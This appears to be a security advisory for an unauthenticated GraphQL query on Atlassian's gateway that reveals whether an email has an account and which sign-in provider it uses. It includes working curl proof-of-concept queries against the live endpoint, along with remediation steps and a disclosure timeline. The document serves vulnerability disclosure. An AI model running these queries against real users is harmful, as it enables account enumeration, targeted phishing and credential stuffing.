## https://sploitus.com/exploit?id=PACKETSTORM:224966
# CVE-2026-XXXX: Atlassian Central GraphQL โ Email Enumeration Oracle
## Product
**Atlassian Central GraphQL Gateway** (`api.atlassian.com/graphql`)
## Vulnerability Type
**CWE-204: Observable Response Discrepancy** โ Email Enumeration Oracle
## Severity
**MEDIUM** โ CVSS 5.3 `AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
## Description
The `loomUnauthenticated_primaryAuthTypeForEmail` GraphQL query on Atlassian's central GraphQL gateway returns different responses depending on whether an email address is registered with Atlassian, allowing unauthenticated user enumeration.
**Registered email** โ returns `authType` (e.g. `workos`, `password`, `google`) and a redirect URI
**Unregistered email** โ returns `authType: "none"` with no redirect URI
No authentication is required. The query name includes "Unauthenticated" โ it's intentionally public, but it shouldn't leak whether an arbitrary email has an Atlassian account.
## Affected Versions
- Atlassian Central GraphQL Gateway (snapshot 37157, build 2026-07-02)
- Endpoint: `https://api.atlassian.com/graphql`
## Proof of Concept
### Registered email (returns auth provider):
```bash
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"admin@atlassian.com\") { authType hasActiveMemberships redirectUri } }"}'
```
Response:
```json
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "workos",
"hasActiveMemberships": false,
"redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
}
}
}
```
### Unregistered email (returns none):
```bash
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"noone@nonexist9999.com\") { authType } }"}'
```
Response:
```json
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "none"
}
}
}
```
### Also leaks: email โ auth provider mapping
`authType: "workos"` confirms the email uses WorkOS SSO. `authType: "google"` or `authType: "password"` would leak auth method. This enables targeted phishing.
## Impact
An unauthenticated attacker can:
- Enumerate registered Atlassian/Loom accounts at scale
- Map emails to their authentication provider (Google SSO, WorkOS, password)
- Use auth provider information for targeted phishing campaigns
- Build lists of valid Atlassian users for credential stuffing
## Root Cause
The `loomUnauthenticated_primaryAuthTypeForEmail` query performs no rate-limiting and returns auth provider information for any email without authentication. While the endpoint is intentionally unauthenticated (for Loom's signup flow), it leaks whether an email has an account and which auth provider they use.
## Remediation
1. Add rate-limiting to prevent bulk enumeration
2. Return a consistent response for both registered and unregistered emails
3. OR: require a CAPTCHA/nonce before querying email status
## What This Is NOT
After thorough testing, these claims were **invalidated**:
- โ No JWT token with privileges (tokens have `aaid: "unidentified"`)
- โ No admin mutation execution (all fail with `ValidationError`)
- โ No authentication bypass (gateway correctly identifies caller as `unidentified`)
- โ No data leakage beyond email/auth-provider mapping
## Timeline
- **2026-06-30:** Discovered
- **2026-06-30:** Reported to security@atlassian.com
- **2026-07-02:** Corrected assessment โ downgraded from Critical (9.8) to Medium (5.3)
## Discovered By
Wh4l3X